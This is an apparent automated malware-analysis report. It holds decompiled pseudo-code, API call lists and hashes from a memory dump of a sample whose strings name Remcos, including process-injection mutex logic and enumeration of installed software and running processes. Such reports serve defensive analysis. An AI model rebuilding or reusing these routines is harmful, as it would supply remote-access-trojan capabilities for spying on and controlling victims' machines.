                              								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
                              								asm("movsw");
                              								asm("movsb");
                              								_t215 = _v64;
                              								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
                              									asm("lock xadd [ecx], eax");
                              									if((_t142 | 0xffffffff) == 0) {
                              										L0043EE85( *(_t215 + 0x90) - 0xfe);
                              										L0043EE85( *(_t215 + 0x94) - 0x80);
                              										L0043EE85( *(_t215 + 0x98) - 0x80);
                              										L0043EE85( *((intOrPtr*)(_t215 + 0x8c)));
                              									}
                              								}
                              								_t143 = _v44;
                              								 *_t143 = 1;
                              								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
                              								 *_t215 = _v60;
                              								 *(_t215 + 0x90) = _v32;
                              								 *(_t215 + 0x94) = _v68;
                              								 *(_t215 + 0x98) = _v56;
                              								 *(_t215 + 4) = _v48;
                              								L37:
                              								L0043EE85(_v52);
                              								goto L41;
                              							} else {
                              								_t189 =  &_v21;
                              								while(1) {
                              									_t160 =  *_t189;
                              									if(_t160 == 0) {
                              										break;
                              									}
                              									_t216 =  *(_t189 - 1) & 0x000000ff;
                              									if(_t216 > (_t160 & 0x000000ff)) {
                              										L30:
                              										_t189 =  &(_t189[2]);
                              										if( *(_t189 - 1) != _t170) {
                              											continue;
                              										}
                              										break;
                              									}
                              									_t209 = _t193 + 0x100 + _t216 * 2;
                              									do {
                              										_t216 = _t216 + 1;
                              										 *_t209 = 0x8000;
                              										_t209 = _t209 + 2;
                              									} while (_t216 <= ( *_t189 & 0x000000ff));
                              									goto L30;
                              								}
                              								goto L32;
                              							}
                              						} else {
                              							_t190 =  &_v21;
                              							while(1) {
                              								_t165 =  *_t190;
                              								if(_t165 == 0) {
                              									goto L22;
                              								}
                              								_t192 =  *(_t190 - 1) & 0x000000ff;
                              								_t166 = _t165 & 0x000000ff;
                              								while(_t192 <= _t166) {
                              									 *((char*)(_t192 + _t197)) = 0x20;
                              									_t192 = _t192 + 1;
                              									__eflags = _t192;
                              									_t166 =  *_t190 & 0x000000ff;
                              								}
                              								_t190 =  &(_t190[2]);
                              								_t242 =  *(_t190 - 1) - _t170;
                              								if( *(_t190 - 1) != _t170) {
                              									continue;
                              								}
                              								goto L22;
                              							}
                              							goto L22;
                              						}
                              					}
                              				}
                              				_t168 = E0044A26E(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
                              				_t219 = _t218 + 0x14;
                              				if(_t168 != 0) {
                              					goto L36;
                              				}
                              				goto L3;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: _free$Info
                              • String ID:
                              • API String ID: 2509303402-0
                              • Opcode ID: fca23b915922a1d6a493f4f724e80eb8bc58a3daeca01358566e9a6e63a64209
                              • Instruction ID: 6b2bdcf8ba42ba7e642015036dc949e4624d86c0fc26f2591f5c67e68ea4a483
                              • Opcode Fuzzy Hash: fca23b915922a1d6a493f4f724e80eb8bc58a3daeca01358566e9a6e63a64209
                              • Instruction Fuzzy Hash: 42B19F71901205AEDB11DFAAC881BEEBBF4FF0C304F14516EF855A7282DA79A845CB64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 63%
                              			E0041755D(void* __ebx, void* __ecx) {
                              				void* _v8;
                              				void* _v12;
                              				char _v16;
                              				char _v40;
                              				char _v64;
                              				char _v88;
                              				char _v112;
                              				char _v136;
                              				char _v160;
                              				char _v184;
                              				char _v208;
                              				char _v232;
                              				char _v256;
                              				char _v280;
                              				char _v304;
                              				char _v328;
                              				char _v352;
                              				char _v376;
                              				char _v400;
                              				char _v424;
                              				char _v448;
                              				char _v472;
                              				char _v1500;
                              				void* __edi;
                              				long _t72;
                              				long _t78;
                              				long _t206;
                              				void* _t207;
                              				intOrPtr* _t208;
                              
                              				_t129 = __ebx;
                              				_t207 = __ecx;
                              				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v12) == 0) {
                              					_v16 = 0x400;
                              					_t206 = 0;
                              					L00401F4D(__ebx,  &_v64);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push( &_v16);
                              					_push( &_v1500);
                              					_push(0);
                              					while(1) {
                              						_t72 = RegEnumKeyExA(_v12, ??, ??, ??, ??, ??, ??, ??);
                              						__eflags = _t72 - 0x103;
                              						if(__eflags == 0) {
                              							break;
                              						}
                              						__eflags = _t72;
                              						if(_t72 != 0) {
                              							L8:
                              							_t206 = _t206 + 1;
                              							__eflags = _t206;
                              							_v16 = 0x400;
                              						} else {
                              							_t78 = RegOpenKeyExA(_v12,  &_v1500, 0, 0x20019,  &_v8);
                              							__eflags = _t78;
                              							if(_t78 == 0) {
                              								E004103AF( &_v40, _v8, L"DisplayName");
                              								 *_t208 = L"Publisher";
                              								E004103AF( &_v184, _v8);
                              								 *_t208 = L"DisplayVersion";
                              								E004103AF( &_v160, _v8);
                              								 *_t208 = L"InstallLocation";
                              								E004103AF( &_v136, _v8);
                              								 *_t208 = L"InstallDate";
                              								E004103AF( &_v112, _v8);
                              								 *_t208 = L"UninstallString";
                              								E004103AF( &_v88, _v8);
                              								__eflags = L00409DB7();
                              								if(__eflags == 0) {
                              									E004032F1(E00403086(_t129,  &_v208, E00403086(_t129,  &_v232, E00404409(_t129,  &_v256, E00403086(_t129,  &_v280, E00404409(_t129,  &_v304, E00403086(_t129,  &_v328, E00404409(_t129,  &_v352, E00403086(_t129,  &_v376, E00404409(_t129,  &_v400, E00403086(_t129,  &_v424, E00404409(_t129,  &_v448, E00407516( &_v472,  &_v40, __eflags, 0x4659b4), __eflags,  &_v160), _t206, __eflags, 0x4659b4), __eflags,  &_v112), _t206, __eflags, 0x4659b4), __eflags,  &_v184), _t206, __eflags, 0x4659b4), __eflags,  &_v136), _t206, __eflags, 0x4659b4), __eflags,  &_v88), _t206, __eflags, 0x4659b4), _t206, __eflags, "\n"));
                              									L00401ED0();
                              									L00401ED0();
                              									L00401ED0();
                              									L00401ED0();
                              									L00401ED0();
                              									L00401ED0();
                              									L00401ED0();
                              									L00401ED0();
                              									L00401ED0();
                              									L00401ED0();
                              									L00401ED0();
                              									L00401ED0();
                              								}
                              								RegCloseKey(_v8);
                              								L00401ED0();
                              								L00401ED0();
                              								L00401ED0();
                              								L00401ED0();
                              								L00401ED0();
                              								L00401ED0();
                              								goto L8;
                              							}
                              						}
                              						__eflags = 0;
                              						_push(0);
                              						_push(0);
                              						_push(0);
                              						_push(0);
                              						_push( &_v16);
                              						_push( &_v1500);
                              						_push(_t206);
                              					}
                              					RegCloseKey(_v12);
                              					E004032FA(_t129, _t207, __eflags,  &_v64);
                              					L00401ED0();
                              				} else {
                              					E0040425F(__ebx, _t207, 0x45f714);
                              				}
                              				return _t207;
                              			}
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041757F
                              • RegEnumKeyExA.ADVAPI32 ref: 00417833
                              • RegCloseKey.ADVAPI32(?), ref: 00417847
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseEnumOpen
                              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                              • API String ID: 1332880857-3714951968
                              • Opcode ID: 5fe97f1940936f28b5bc2917c3de0c1abf0cc52e137a6ae1b947a500aaf29ee4
                              • Instruction ID: 918c60c30167cdbca0fafa00f68e4c19a9dd40daefd47028054c4c048a220fb3
                              • Opcode Fuzzy Hash: 5fe97f1940936f28b5bc2917c3de0c1abf0cc52e137a6ae1b947a500aaf29ee4
                              • Instruction Fuzzy Hash: B9813F719101089BDB14EB62DC52AEEB379EF54305F1041AFB50AB21D1EF346F85CA69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004480F6(intOrPtr _a4) {
                              				intOrPtr _v8;
                              				intOrPtr _t25;
                              				intOrPtr* _t26;
                              				intOrPtr _t28;
                              				intOrPtr* _t29;
                              				intOrPtr* _t31;
                              				intOrPtr* _t45;
                              				intOrPtr* _t46;
                              				intOrPtr* _t47;
                              				intOrPtr* _t55;
                              				intOrPtr* _t70;
                              				intOrPtr _t74;
                              
                              				_t74 = _a4;
                              				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                              				if(_t25 != 0 && _t25 != 0x46a188) {
                              					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                              					if(_t45 != 0 &&  *_t45 == 0) {
                              						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                              						if(_t46 != 0 &&  *_t46 == 0) {
                              							L0043EE85(_t46);
                              							E00447332( *((intOrPtr*)(_t74 + 0x88)));
                              						}
                              						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                              						if(_t47 != 0 &&  *_t47 == 0) {
                              							L0043EE85(_t47);
                              							E004477EC( *((intOrPtr*)(_t74 + 0x88)));
                              						}
                              						L0043EE85( *((intOrPtr*)(_t74 + 0x7c)));
                              						L0043EE85( *((intOrPtr*)(_t74 + 0x88)));
                              					}
                              				}
                              				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                              				if(_t26 != 0 &&  *_t26 == 0) {
                              					L0043EE85( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                              					L0043EE85( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                              					L0043EE85( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                              					L0043EE85( *((intOrPtr*)(_t74 + 0x8c)));
                              				}
                              				E00448269( *((intOrPtr*)(_t74 + 0x9c)));
                              				_t28 = 6;
                              				_t55 = _t74 + 0xa0;
                              				_v8 = _t28;
                              				_t70 = _t74 + 0x28;
                              				do {
                              					if( *((intOrPtr*)(_t70 - 8)) != 0x46a2a8) {
                              						_t31 =  *_t70;
                              						if(_t31 != 0 &&  *_t31 == 0) {
                              							L0043EE85(_t31);
                              							L0043EE85( *_t55);
                              						}
                              						_t28 = _v8;
                              					}
                              					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                              						_t29 =  *((intOrPtr*)(_t70 - 4));
                              						if(_t29 != 0 &&  *_t29 == 0) {
                              							L0043EE85(_t29);
                              						}
                              						_t28 = _v8;
                              					}
                              					_t55 = _t55 + 4;
                              					_t70 = _t70 + 0x10;
                              					_t28 = _t28 - 1;
                              					_v8 = _t28;
                              				} while (_t28 != 0);
                              				return L0043EE85(_t74);
                              			}
                              APIs
                              • ___free_lconv_mon.LIBCMT ref: 0044813A
                                • Part of subcall function 00447332: _free.LIBCMT ref: 0044734F
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447361
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447373
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447385
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447397
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473A9
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473BB
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473CD
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473DF
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473F1
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447403
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447415
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447427
                              • _free.LIBCMT ref: 0044812F
                                • Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?), ref: 0043EE9B
                                • Part of subcall function 0043EE85: GetLastError.KERNEL32(?,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?,?), ref: 0043EEAD
                              • _free.LIBCMT ref: 00448151
                              • _free.LIBCMT ref: 00448166
                              • _free.LIBCMT ref: 00448171
                              • _free.LIBCMT ref: 00448193
                              • _free.LIBCMT ref: 004481A6
                              • _free.LIBCMT ref: 004481B4
                              • _free.LIBCMT ref: 004481BF
                              • _free.LIBCMT ref: 004481F7
                              • _free.LIBCMT ref: 004481FE
                              • _free.LIBCMT ref: 0044821B
                              • _free.LIBCMT ref: 00448233
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                              • String ID:
                              • API String ID: 161543041-0
                              • Opcode ID: 8b17bf4bcecabb647019a779e3dd08f50c7c3410c3c01fd7615392e0bfe9a2e3
                              • Instruction ID: a56d3d2c39c59f1f27121bff60bdf2851450fdc6f924b8cf5ee19873ea009e99
                              • Opcode Fuzzy Hash: 8b17bf4bcecabb647019a779e3dd08f50c7c3410c3c01fd7615392e0bfe9a2e3
                              • Instruction Fuzzy Hash: 1F318B316007019FEF20AA7AD846B5BB3E8EF45754F10495FE068E7291DF78AC46CB18
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 97%
                              			E0040D1AD(void* __eflags, char _a4) {
                              				void* _v8;
                              				char _v32;
                              				char _v56;
                              				char _v60;
                              				char _v64;
                              				char _v68;
                              				char _v72;
                              				char _v96;
                              				char _v120;
                              				char _v648;
                              				intOrPtr _v676;
                              				void* _v684;
                              				short _v1204;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t76;
                              				struct _SECURITY_ATTRIBUTES* _t106;
                              				char* _t111;
                              				void* _t158;
                              				void* _t161;
                              
                              				_t106 = 0;
                              				GetModuleFileNameW(0,  &_v1204, 0x104);
                              				_t149 = "1";
                              				if(E00407746("1") != 0) {
                              					L14:
                              					L00401EDA( &_a4, _t149, _t159, E00416773(_t106,  &_v120, _t149));
                              					_t111 =  &_v120;
                              					L00401ED0();
                              					if(L00416F6C(_t111) != 0) {
                              						_push(_t111);
                              						if(E0040D84F( &_a4, L"Program Files\\") != 0xffffffff) {
                              							E0040D870(_t106,  &_a4, _t157, _t73, 0xe, L"Program Files (x86)\\");
                              						}
                              					}
                              					if(L0040EE85( &_v1204,  &_a4) != 0) {
                              						L22:
                              						L00401ED0();
                              						return _t106;
                              					} else {
                              						L18:
                              						_t158 = CreateMutexA(_t106, 1, "Remcos_Mutex_Inj");
                              						E004020B5(_t106,  &_v96);
                              						E00417334(L00401ECB(0x46c500),  &_v96);
                              						L00401F75( &_v96);
                              						if(L00413CCA(L00401ECB( &_a4)) == 0) {
                              							CloseHandle(_t158);
                              						} else {
                              							_t106 = 1;
                              							E004105A0(0x46c518, L00401F75(0x46c518), "Inj", 1);
                              						}
                              						L00401FA7();
                              						goto L22;
                              					}
                              				}
                              				L00401F4D(0,  &_v32);
                              				_t76 = CreateToolhelp32Snapshot(2, 0);
                              				_v8 = _t76;
                              				_v684 = 0x22c;
                              				Process32FirstW(_t76,  &_v684);
                              				while(Process32NextW(_v8,  &_v684) != 0) {
                              					E0040425F(_t106,  &_v56,  &_v648);
                              					_t157 = E004022EA( &_v56,  &_v60);
                              					_t159 = E004022AD( &_v56,  &_v64);
                              					E00408228( &_v72,  *((intOrPtr*)(E004022EA( &_v56,  &_v68))),  *_t84,  *_t82);
                              					_t161 = _t161 + 0xc;
                              					if(L00409EAE( &_a4) != 0) {
                              						L00401EDA( &_v32, _v676, _t159, L00416FD0( &_v120, _v676));
                              						L00401ED0();
                              						if(E00407746( &_v1204) == 0) {
                              							_t149 = 0x45f714;
                              							if(E00407746(0x45f714) != 0 || L00416F9A(_v676) != 0) {
                              								L00401ED0();
                              								L13:
                              								L00401ED0();
                              								goto L14;
                              							} else {
                              								L00409E58( &_v32);
                              								L00401ED0();
                              								break;
                              							}
                              						}
                              						L00401ED0();
                              						L00401ED0();
                              						goto L22;
                              					}
                              					L00401ED0();
                              				}
                              				CloseHandle(_v8);
                              				_t149 = 0x45f714;
                              				if(E00407746(0x45f714) != 0) {
                              					goto L13;
                              				}
                              				L00401ED0();
                              				goto L18;
                              			}
                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,0046C578,00000000,00000001), ref: 0040D1C8
                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0040D1EE
                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040D209
                              • Process32NextW.KERNEL32(0040CC11,0000022C), ref: 0040D27A
                              • CloseHandle.KERNEL32(0040CC11,?,00000000,?,?,?), ref: 0040D287
                              • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj,00000000), ref: 0040D39D
                              • CloseHandle.KERNEL32(00000000), ref: 0040D3FF
                                • Part of subcall function 00416FD0: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00416FE5
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                              • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                              • API String ID: 193334293-694575909
                              • Opcode ID: c1ee45c483fb74bc2a0db2c73283c01417bd6b15af02eb149c2665c24deec1e9
                              • Instruction ID: 478cdb67a5d67a03f70ae787e2c2ba94b2730d13673da361e8ab10cc645f79f9
                              • Opcode Fuzzy Hash: c1ee45c483fb74bc2a0db2c73283c01417bd6b15af02eb149c2665c24deec1e9
                              • Instruction Fuzzy Hash: 51613F30900209AACF14EFA1D9969EE7735AF10349F50417EB816771E2EF386E4ECA59
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 97%
                              			E00447430(void* __edx, char _a4) {
                              				void* _v8;
                              				void* _v12;
                              				signed int _v16;
                              				intOrPtr* _v20;
                              				signed int _v24;
                              				char _v28;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t105;
                              				char _t195;
                              				char _t210;
                              				signed int _t213;
                              				void* _t224;
                              				char* _t226;
                              				signed int _t227;
                              				signed int _t231;
                              				signed int _t232;
                              				void* _t234;
                              				void* _t236;
                              				signed int _t237;
                              				signed int _t238;
                              				signed int _t239;
                              				signed int _t240;
                              				signed int _t241;
                              				signed int _t242;
                              				signed int _t243;
                              				signed int _t244;
                              				signed int _t245;
                              				signed int _t246;
                              				signed int _t247;
                              				signed int _t248;
                              				signed int _t249;
                              				signed int _t250;
                              				signed int _t251;
                              				signed int _t252;
                              				signed int _t253;
                              				signed int _t254;
                              				signed int _t255;
                              				signed int _t256;
                              				char* _t257;
                              
                              				_t224 = __edx;
                              				_t210 = _a4;
                              				_v16 = 0;
                              				_v28 = _t210;
                              				_v24 = 0;
                              				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
                              					_t234 = L0043DFD9(0, 1, 0x50);
                              					_v8 = _t234;
                              					L0043EE85(0);
                              					if(_t234 != 0) {
                              						_t227 = L0043DFD9(0, 1, 4);
                              						_v12 = _t227;
                              						L0043EE85(0);
                              						if(_t227 != 0) {
                              							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
                              								_t213 = 0x14;
                              								memcpy(_v8, 0x46a188, _t213 << 2);
                              								L25:
                              								_t236 = _v8;
                              								_t231 = _v16;
                              								 *_t236 =  *( *(_t210 + 0x88));
                              								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
                              								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
                              								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
                              								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
                              								 *_v12 = 1;
                              								if(_t231 != 0) {
                              									 *_t231 = 1;
                              								}
                              								goto L27;
                              							}
                              							_t232 = L0043DFD9(0, 1, 4);
                              							_v16 = _t232;
                              							L0043EE85(0);
                              							if(_t232 != 0) {
                              								_t233 =  *((intOrPtr*)(_t210 + 0xac));
                              								_t14 = _t234 + 0xc; // 0xc
                              								_t237 = E0044A26E(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
                              								_t238 = _t237 | E0044A26E(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
                              								_t239 = _t238 | E0044A26E(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
                              								_t240 = _t239 | E0044A26E(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
                              								_v20 = _v8 + 0x1c;
                              								_t241 = _t240 | E0044A26E(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
                              								_t242 = _t241 | E0044A26E(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
                              								_t243 = _t242 | E0044A26E(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
                              								_t244 = _t243 | E0044A26E(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
                              								_t245 = _t244 | E0044A26E(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
                              								_t246 = _t245 | E0044A26E(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
                              								_t247 = _t246 | E0044A26E(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
                              								_t248 = _t247 | E0044A26E(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
                              								_t249 = _t248 | E0044A26E(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
                              								_t250 = _t249 | E0044A26E(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
                              								_t251 = _t250 | E0044A26E(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
                              								_t252 = _t251 | E0044A26E(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
                              								_t253 = _t252 | E0044A26E(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
                              								_t254 = _t253 | E0044A26E(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
                              								_t255 = _t254 | E0044A26E(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
                              								_t256 = _t255 | E0044A26E(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
                              								if((E0044A26E(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
                              									_t226 =  *_v20;
                              									while( *_t226 != 0) {
                              										_t195 =  *_t226;
                              										if(_t195 < 0x30 || _t195 > 0x39) {
                              											if(_t195 != 0x3b) {
                              												goto L17;
                              											}
                              											_t257 = _t226;
                              											do {
                              												 *_t257 =  *((intOrPtr*)(_t257 + 1));
                              												_t257 = _t257 + 1;
                              											} while ( *_t257 != 0);
                              										} else {
                              											 *_t226 = _t195 - 0x30;
                              											L17:
                              											_t226 = _t226 + 1;
                              										}
                              									}
                              									goto L25;
                              								}
                              								E00447332(_v8);
                              								L0043EE85(_v8);
                              								L0043EE85(_v12);
                              								L0043EE85(_v16);
                              								goto L4;
                              							}
                              							L0043EE85(_t234);
                              							L0043EE85(_v12);
                              							L7:
                              							goto L4;
                              						}
                              						L0043EE85(_t234);
                              						goto L7;
                              					}
                              					L4:
                              					return 1;
                              				} else {
                              					_t231 = 0;
                              					_v12 = 0;
                              					_t236 = 0x46a188;
                              					L27:
                              					_t105 =  *(_t210 + 0x84);
                              					if(_t105 != 0) {
                              						asm("lock dec dword [eax]");
                              					}
                              					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
                              						asm("lock xadd [ecx], eax");
                              						if((_t105 | 0xffffffff) == 0) {
                              							L0043EE85( *(_t210 + 0x88));
                              							L0043EE85( *((intOrPtr*)(_t210 + 0x7c)));
                              						}
                              					}
                              					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
                              					 *(_t210 + 0x84) = _t231;
                              					 *(_t210 + 0x88) = _t236;
                              					return 0;
                              				}
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: c5f37deec73d9b5cc2a4134985582e4ef4d7709f3f145db41daa550356359588
                              • Instruction ID: e6ea3b258e32db2a5a612ec849509408c7eabbb72dddc33eac43ea41aa3f9500
                              • Opcode Fuzzy Hash: c5f37deec73d9b5cc2a4134985582e4ef4d7709f3f145db41daa550356359588
                              • Instruction Fuzzy Hash: 6DC15672D45204AFEB20DBA9CC83FEE77F8AB08704F14415AFA05FB382D674994197A5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 41%
                              			E0044E57E(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                              				signed int _v5;
                              				char _v6;
                              				void* _v12;
                              				signed int _v16;
                              				signed int _v20;
                              				char _v24;
                              				intOrPtr _v36;
                              				signed int _v44;
                              				void _v48;
                              				char _v72;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				signed int _t114;
                              				signed int _t123;
                              				signed char _t124;
                              				signed int _t134;
                              				intOrPtr _t164;
                              				intOrPtr _t180;
                              				signed int* _t190;
                              				signed int _t192;
                              				char _t197;
                              				signed int _t203;
                              				signed int _t206;
                              				signed int _t215;
                              				signed int _t217;
                              				signed int _t219;
                              				signed int _t225;
                              				signed int _t227;
                              				signed int _t234;
                              				signed int _t235;
                              				signed int _t237;
                              				signed int _t239;
                              				signed char _t242;
                              				intOrPtr _t245;
                              				void* _t248;
                              				void* _t252;
                              				void* _t262;
                              				signed int _t263;
                              				signed int _t266;
                              				signed int _t269;
                              				signed int _t270;
                              				void* _t272;
                              				void* _t274;
                              				void* _t275;
                              				void* _t277;
                              				void* _t278;
                              				void* _t280;
                              				void* _t284;
                              
                              				_t262 = E0044E2E1(__ecx,  &_v72, _a16, _a20, _a24);
                              				_t192 = 6;
                              				memcpy( &_v48, _t262, _t192 << 2);
                              				_t274 = _t272 + 0x1c;
                              				_t248 = _t262 + _t192 + _t192;
                              				_t263 = _t262 | 0xffffffff;
                              				if(_v36 != _t263) {
                              					_t114 = E00447125(_t248, _t263, __eflags);
                              					_t190 = _a8;
                              					 *_t190 = _t114;
                              					__eflags = _t114 - _t263;
                              					if(_t114 != _t263) {
                              						_v20 = _v20 & 0x00000000;
                              						_v24 = 0xc;
                              						_t275 = _t274 - 0x18;
                              						 *_a4 = 1;
                              						_push(6);
                              						_v16 =  !(_a16 >> 7) & 1;
                              						_push( &_v24);
                              						_push(_a12);
                              						memcpy(_t275,  &_v48, 1 << 2);
                              						_t197 = 0;
                              						_t252 = E0044E24C();
                              						_t277 = _t275 + 0x2c;
                              						_v12 = _t252;
                              						__eflags = _t252 - 0xffffffff;
                              						if(_t252 != 0xffffffff) {
                              							L11:
                              							_t123 = GetFileType(_t252);
                              							__eflags = _t123;
                              							if(_t123 != 0) {
                              								__eflags = _t123 - 2;
                              								if(_t123 != 2) {
                              									__eflags = _t123 - 3;
                              									_t124 = _v48;
                              									if(_t123 == 3) {
                              										_t124 = _t124 | 0x00000008;
                              										__eflags = _t124;
                              									}
                              								} else {
                              									_t124 = _v48 | 0x00000040;
                              								}
                              								_v5 = _t124;
                              								E0044706E(_t197,  *_t190, _t252);
                              								_t242 = _v5 | 0x00000001;
                              								_v5 = _t242;
                              								_v48 = _t242;
                              								 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
                              								_t203 =  *_t190;
                              								_t205 = (_t203 & 0x0000003f) * 0x30;
                              								__eflags = _a16 & 0x00000002;
                              								 *((char*)( *((intOrPtr*)(0x46b800 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                              								if((_a16 & 0x00000002) == 0) {
                              									L20:
                              									_v6 = 0;
                              									_push( &_v6);
                              									_push(_a16);
                              									_t278 = _t277 - 0x18;
                              									_t206 = 6;
                              									_push( *_t190);
                              									memcpy(_t278,  &_v48, _t206 << 2);
                              									_t134 = L0044DFFF(_t190,  &_v48 + _t206 + _t206,  &_v48);
                              									_t280 = _t278 + 0x30;
